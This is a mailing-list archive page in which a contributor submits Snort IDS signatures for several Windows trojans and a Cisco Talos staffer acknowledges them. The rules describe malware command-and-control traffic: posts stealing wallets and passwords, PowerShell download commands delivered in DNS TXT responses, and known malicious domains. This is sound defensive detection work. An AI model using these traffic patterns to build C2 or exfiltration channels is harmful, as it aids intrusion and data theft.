Snort mailing list archives
Re: Multiple signatures 005
From: Marcos Rodriguez <mrodriguez () sourcefire com>
Date: Mon, 23 Jul 2018 14:55:58 -0400
On Mon, Jul 23, 2018 at 12:59 PM, Y M via Snort-sigs < snort-sigs () lists snort org> wrote:
Hi, May I suggest enjoying a21b5295ca0e1f10ca7c3f76b632e4de (Win.Trojan.Swrort below); PowerShell command execution via DNS TXT response. Pcaps are available for all of the rules. # -------------------- # Date: 2018-07-21 # Title: Win.Trojan.Fuerboos, Win.Trojan.NeutrinoBot # Tests: pcap # Reference: # - https://www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173 e615c2f3d95a46f2059d06050dd7dbcb0f/detection # Confidence: medium alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"auth=1"; http_client_body; metadata:ruleset community, service http; reference:url, www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173 e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000190; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"cmd="; http_client_body; content:"&uid="; http_client_body; content:"&os="; http_client_body; content:"&av="; http_client_body; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/ 8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000191; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"fail="; http_client_body; content:"&task_id="; http_client_body; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/ 8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000192; rev:1;) # -------------------- # Date: 2018-07-21 # Title: Win.Trojan.GenKryptik (Talso File Reputation: W32.3A4A773CDF-95.SBX.TG) # Tests: pcap # Reference: # - https://www.virustotal.com/#/file/3a4a773cdfa20182f6fab817d010a0 a47e94784e1b02e009c1c5c9766b43a25f/detection # Confidence: medium alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.GenKryptik outbound connection"; flow:to_server,established; urilen:10; content:"User-Agent: Mozilla/4.0 (compatible|3B| MSIE 6.0b|3B| Windows NT 5.1)"; fast_pattern:only; http_header; content:"/index.php"; http_uri; content:"POST"; http_method; content:"Content-Length"; http_header; content:!"Content-Type"; http_header; content:!"Connection"; http_header; content:!"Accept"; http_header; content:!"Referer"; http_header; metadata:ruleset community, service http; reference:url, www.virustotal.com/#/file/3a4a773cdfa20182f6fab817d010a0 a47e94784e1b02e009c1c5c9766b43a25f/detection; classtype:trojan-activity; sid:8000194; rev:1;) # -------------------- # Date: 2018-07-22 # Title: Win.Trojan.MSIL (ClamAV: Win.Trojan.Agent-1288686, Talos File Reputation: W32.Auto:cc093c.in03.Talos) # Tests: pcap # Reference: # - https://www.virustotal.com/#/file/cc093cca83f700878856b06cb3623a 912550d44f82071e88cbbc160381391a91/detection # Confidence: medium alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.MSIL outbound conneciton"; flow:to_server,established; content:"&wallets="; fast_pattern:only; http_uri; content:"?hwid="; http_uri; content:"&pswd="; http_uri; content:"&telegram="; http_uri; content:"name=|22|file|22 3B|"; http_client_body; content:!"User-Agent"; http_header; metadata:ruleset community, service http; reference:url, www.virustotal.com/#/file/cc093cca83f700878856b06cb3623a 912550d44f82071e88cbbc160381391a91/detection; classtype:trojan-activity; sid:8000195; rev:1;) # -------------------- # Date: 2018-07-22 # Title: Win.Trojan.Swrort (ClamAV: Win.Trojan.Swrort-5710536-0) # Tests: pcap # Reference: # - https://www.virustotal.com/#/file/c4f069d079330cd46e51f9469c2701 5ed34c6371481df83a323bc098f3b53382/detection # Confidence: medium # Notes: # - PowerShell execution via DNS TXT # - The word "shino" in the domains maybe referred as "what" in some dialects alert udp any any -> $HOME_NET any (msg:"MALWARE-CNC PowerShell command in DNS TXT Response"; flow:to_client; dsize:>100; content:"|00 10 00 01 00 00|"; content:"powershell "; distance:0; nocase; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/ c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000196; rev:1;) alert udp any any -> $HOME_NET any (msg:"MALWARE-CNC PowerShell command in DNS TXT Response"; flow:to_client; dsize:>100; content:"|00 10 00 01 00 00|"; content:"new-object net.webclient"; nocase; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/ c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000197; rev:1;) alert udp $HOME_NET any -> $EXTERNAL_NET 53 (msg:"MALWARE-OTHER DNS request for known malware domain shinohack.me - Win.Trojan.Swrort"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|09|shinohack|02|me"; fast_pattern:only; content:"|00 10 00 01|"; distance:0; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/ c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000198; rev:1;) alert udp $HOME_NET any -> $EXTERNAL_NET 53 (msg:"MALWARE-OTHER DNS request for known malware domain shinobotps1.com - Win.Trojan.Swrort"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0B|shinobotps1|03|com"; fast_pattern:only; content:"|00 01 00 01|"; distance:0; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/ c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000199; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"MALWARE-CNC Win.Trojan.Swrort inbound SSL certificate"; flow:to_client,established; content:"|16 03 01|"; content:"|02|"; distance:2; content:"|03 01|"; distance:3; content:"|55 04 03 13 0F|shinobotps1.com"; metadata:ruleset community, service ssl; reference:url,app.any.run/ tasks/95c76eff-5118-46d1-9e62-cc5d4d2a1310; classtype:trojan-activity; sid:8000200; rev:1;) Thanks. YM _______________________________________________ Snort-sigs mailing list Snort-sigs () lists snort org https://lists.snort.org/mailman/listinfo/snort-sigs Please visit http://blog.snort.org for the latest news about Snort! Please follow these rules: https://snort.org/faq/what-is- the-mailing-list-etiquette Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a href=" https://snort.org/downloads/#rule-downloads">emerging threats</a>!
Hi Yaser, Thanks for these submissions. We will review each of them and get back to you when finished. We'd appreciate any pcaps you could send, including the follow-up email you sent for CVE-2018-2894. Have a great day! -- Marcos Rodriguez Cisco Talos
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists snort org https://lists.snort.org/mailman/listinfo/snort-sigs Please visit http://blog.snort.org for the latest news about Snort! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a href=" https://snort.org/downloads/#rule-downloads">emerging threats</a>!
Current thread:
- Multiple signatures 005 Y M via Snort-sigs (Jul 23)
- Re: Multiple signatures 005 Marcos Rodriguez (Jul 23)